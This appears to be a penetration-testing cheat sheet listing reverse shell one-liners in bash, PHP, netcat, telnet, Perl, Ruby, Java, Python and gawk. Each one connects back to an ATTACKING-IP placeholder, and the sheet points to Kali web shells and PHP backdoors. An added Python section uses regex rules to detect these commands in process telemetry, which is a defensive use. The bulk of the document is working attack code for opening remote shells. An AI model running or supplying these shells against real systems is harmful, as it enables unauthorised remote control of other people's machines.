Reverse Shell Cheat Sheet
cheat-sheet, 29 Mar 2015, Arr0way
- Setup Listening Netcat
- Bash Reverse Shells
- PHP Reverse Shell
- Netcat Reverse Shell
- Telnet Reverse Shell
- Perl Reverse Shell
- Perl Windows Reverse Shell
https://highon.coffee/blog/reverse-shell-cheat-sheet/
During penetration testing, if you're lucky enough to find a remote command execution vulnerability, you'll more often than not want to connect back to your attacking machine to leverage an interactive shell.
Below is a collection of reverse shells that use commonly installed programming languages or commonly installed binaries (nc, telnet, bash, etc). At the bottom of the post is a collection of uploadable reverse shells present in Kali Linux.
Setup Listening Netcat
Your remote shell will need a listening netcat instance in order to connect back.
Set your Netcat listening shell on an allowed port
Use a port that is likely allowed via outbound firewall rules on the target network, e.g. 80 / 443
To set up a listening netcat instance, enter the following:
- Code:
root@kali:~# nc -nvlp 80
nc: listening on :: 80 ...
nc: listening on 0.0.0.0 80 ...
NAT requires a port forward
If your attacking machine is behind a NAT router, you'll need to set up a port forward to the attacking machine's IP / port.
ATTACKING-IP is the machine running your listening netcat session, port 80 is used in all examples below (for reasons mentioned above).
Bash Reverse Shells
- Code:
exec /bin/bash 0&0 2>&0
- Code:
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
- Code:
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done
# or:
while read line 0<&5; do $line 2>&5 >&5; done
- Code:
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
PHP Reverse Shell
- Code:
php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'
(Assumes TCP uses file descriptor 3. If it doesn't work, try 4, 5, or 6.)
Netcat Reverse Shell
- Code:
nc -e /bin/sh ATTACKING-IP 80
- Code:
/bin/sh | nc ATTACKING-IP 80
- Code:
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
Telnet Reverse Shell
- Code:
rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
- Code:
telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443
Remember to listen on 443 on the attacking machine also.
Perl Reverse Shell
- Code:
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Perl Windows Reverse Shell
- Code:
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
- Code:
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Ruby Reverse Shell
- Code:
ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Java Reverse Shell
- Code:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Python Reverse Shell
- Code:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Gawk Reverse Shell
- Code:
#!/usr/bin/gawk -f
BEGIN {
    Port = 8080
    Prompt = "bkd> "
    Service = "/inet/tcp/" Port "/0/0"
    while (1) {
        do {
            printf Prompt |& Service
            Service |& getline cmd
            if (cmd) {
                while ((cmd |& getline) > 0)
                    print $0 |& Service
                close(cmd)
            }
        } while (cmd != "exit")
        close(Service)
    }
}
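From the defender's side, most of the one-liners above share a small set of traits that are visible in process command-line telemetry. The following is an added example, not code from the original post: a Python triage routine that flags those traits in constructed sample events. The rule names, PIDs and the `classify` / `triage` helpers are assumptions for illustration, and it assumes the full command string is captured (for example as the argument of `sh -c` spawned by a vulnerable service).

```python
import re

# Rule name -> regex over one process command line. Each rule keys on a trait
# the one-liners share, not on a particular IP address or port.
RULES = {
    # bash's /dev/tcp pseudo-device used as a redirection target
    "bash-dev-tcp": re.compile(r"/dev/(tcp|udp)/[^/\s]+/\d+"),
    # netcat started with -e and a shell as the program to run
    "netcat-exec": re.compile(
        r"\b(nc|ncat|netcat)\b.*\s-\w*e\w*\s+\S*(sh|bash)\b"),
    # named pipe created, then handed to nc/telnet in the same command
    "fifo-relay": re.compile(r"\bmk(nod|fifo)\b.*\b(nc|ncat|netcat|telnet)\b"),
    # a shell's output piped straight into a network client
    "shell-piped-to-net": re.compile(
        r"\b(sh|bash)\s*\|\s*(nc|ncat|netcat|telnet)\b"),
    # interpreter one-liner that opens a socket and also names /bin/sh
    "interp-socket-shell": re.compile(
        r"\b(python\d?|perl|ruby|php)\b.*\s-\w*[ecr]\b.*"
        r"(socket|fsockopen|TCPSocket).*/bin/(ba)?sh", re.I),
}

def classify(cmdline):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def triage(events):
    """events: iterable of (pid, cmdline). Return {pid: [rule, ...]} for hits."""
    return {pid: hits for pid, cmd in events if (hits := classify(cmd))}

# Constructed sample events: (pid, command line). ATTACKING-IP is the page's
# placeholder; the last two entries are benign look-alikes.
SAMPLE_EVENTS = [
    (4101, "bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1"),
    (4102, "nc -e /bin/sh ATTACKING-IP 80"),
    (4103, "rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p"),
    (4104, "telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443"),
    (4105, "php -r '$sock=fsockopen(\"ATTACKING-IP\",80);"
           "exec(\"/bin/sh -i <&3 >&3 2>&3\");'"),
    (4106, "python3 -c 'import socket; print(socket.gethostname())'"),
    (4107, "nc -zv 10.0.0.5 443"),
]

if __name__ == "__main__":
    for pid, hits in triage(SAMPLE_EVENTS).items():
        print(pid, ",".join(hits))
```

Script files such as the gawk example are not covered, because their contents never appear on the command line; those need file-content or network-connection telemetry instead.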
Kali Web Shells
The following shells exist within Kali Linux, under:
- Code:
/usr/share/webshells/
Kali PHP Web Shells
- Pen Test Monkey - PHP Reverse Shell
- Pen Test Monkey, Findsock Shell. Build
- PHP backdoor, useful for CMD execution if upload / code injection is possible, usage:
- Larger PHP shell, with a text input box for command execution.
The last two shells above are not reverse shells, however they can be useful for executing a reverse shell.
Kali Perl Reverse Shell
- Pen Test Monkey - Perl Reverse Shell
- Pen Test Monkey, Perl Shell. Usage:
Kali Cold Fusion Shell
- Cold Fusion Shell - aka CFM Shell
Kali ASP Shell
- Kali ASP Shells
Kali ASPX Shells
- Kali ASPX Shells
Kali JSP Reverse Shell
- Kali JSP Reverse Shell
The contents of this website are © 2017 HighOn.Coffee